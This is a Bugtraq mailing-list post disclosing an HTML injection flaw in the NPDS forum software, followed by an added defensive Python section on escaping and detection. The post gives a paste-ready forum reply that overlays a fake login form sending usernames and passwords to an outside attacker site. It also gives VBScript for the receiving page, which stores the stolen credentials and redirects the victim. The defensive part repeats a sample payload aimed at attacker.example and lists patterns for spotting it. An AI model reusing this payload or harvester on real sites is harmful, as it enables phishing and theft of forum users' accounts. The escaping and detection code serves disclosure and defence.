Bugtraq mailing list archives

Npds BB HTML Injection


From: Benjamin Tolman <rituel () voila fr>
Date: 7 Jul 2004 06:59:40 -0000



I am releasing it very quickly, so it can be improved:

Code to put in a reply or in a topic:

Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1" class="ONGL">&nbsp;&nbsp<a 
href="user.php?op=userinfo&uname=User" CLASS="NOIR" target=_blank><img src="images/forum/icons/profile.gif" border=0 
ALT="">Profil</a>&nbsp;&nbsp;<a href="http://www.userland.com"; TARGET="_blank" CLASS="NOIR" TARGET="_blank"><IMG 
SRC="images/forum/icons/www_icon.gif" BORDER=0 Alt="">www</a>&nbsp;&nbsp;<a 
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG SRC="images/forum/icons/quote.gif" BORDER="0" 
Alt=""><FONT SIZE=1>Citation</FONT></a>

&nbsp;&nbsp;<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG SRC="images/forum/icons/print.gif" 
BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>



<div style="position: absolute; left=0; top=0; height=3200; width=150"><form 
action="http://mon-site-de-roxor.com/roxor.asp"; method="post" name="piquage" target="_self"><table width="100%" 
border="0" cellspacing="0" cellpadding="0"><tr><td colspan="2"><div align="center">Your session has expired. Please log 
in to reply.</div></td></tr><tr><td>&nbsp;</td></tr><tr><td><div align="right">Login :</div> </td> <td><input 
name="login" type="text" value=""> </td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input 
name="password" type="password" value=""> </td></tr><tr><td>&nbsp;</td></tr><tr><td colspan="2"><div 
align="center"><input type="submit" name="Submit" value="Envoyer"></div></td></tr></table></form></div>

Example of code (VBScript) to put in the page called by the form in the topic:

<%@ Language=VBScript %>
<%
set base=server.createobject("ADODB.CONNECTION")
base.open nom_base, login_base, password_base

referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)
login=Request.QueryString("login")
password=Request.QueryString("password")

requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES (getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) + "')"

set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")
resultat_vol_infos.Open requete_vol_infos, base

response.redirect(referant)
%>

Thanks to N-0-X and NewFFR :o)

Rituel
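The root cause in the post above is that the forum echoes a reply body into its table layout without escaping, so a reply can close the current cell and overlay an absolutely positioned fake login form. The following is an added, defender-side example and is not part of Rituel's post or of the NPDS code base: it escapes a post body the way a forum template should (NPDS is PHP, where htmlspecialchars() does the same job) and, separately, flags raw post bodies that carry the building blocks of this overlay trick. The sample posts and the pattern list are constructed for the example.

```python
import html
import re

# Constructed samples (not the original payload): a harmless reply, and a reply shaped
# like the injection above, which closes the post's table cell and overlays a fake login form.
BENIGN_POST = "Thanks, that fixed my install <3"
INJECTED_POST = (
    'Your fake message</td></tr><tr><td>'
    '<div style="position: absolute; left:0; top:0">'
    '<form action="http://attacker.example/collect" method="post">'
    'Login: <input name="login"> '
    'Mot de passe: <input name="password" type="password">'
    '<input type="submit"></form></div>'
)


def render_post_body(body: str) -> str:
    """Escape a user-supplied post body before placing it inside the forum template.

    html.escape turns <, >, &, " and ' into entities, so the post can neither close the
    template's <td> nor open a <form>; the browser shows the tag text instead of markup.
    """
    return html.escape(body, quote=True)


# Patterns a moderation queue or request filter can use to flag markup injection attempts.
# The list is an assumption for this example, drawn from the techniques in the post above.
SUSPICIOUS_PATTERNS = {
    "closes a table cell": re.compile(r"</\s*t[dr]\s*>", re.I),
    "embeds a form": re.compile(r"<\s*form\b", re.I),
    "password input": re.compile(r"type\s*=\s*[\"']?password", re.I),
    "absolute positioning": re.compile(r"position\s*:\s*absolute", re.I),
}


def flag_post(body: str) -> list[str]:
    """Return the name of every suspicious pattern found in the raw post body."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(body)]


def is_inert(rendered: str) -> bool:
    """True when the rendered fragment contains no raw tag delimiters at all."""
    return "<" not in rendered and ">" not in rendered


if __name__ == "__main__":
    for post in (BENIGN_POST, INJECTED_POST):
        print(flag_post(post), is_inert(render_post_body(post)))
```

Escaping on output is the fix; the pattern check is only a detection aid, since an attacker can vary the markup, but it is cheap to run over the existing posts table to find replies that already carry a fake login form.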

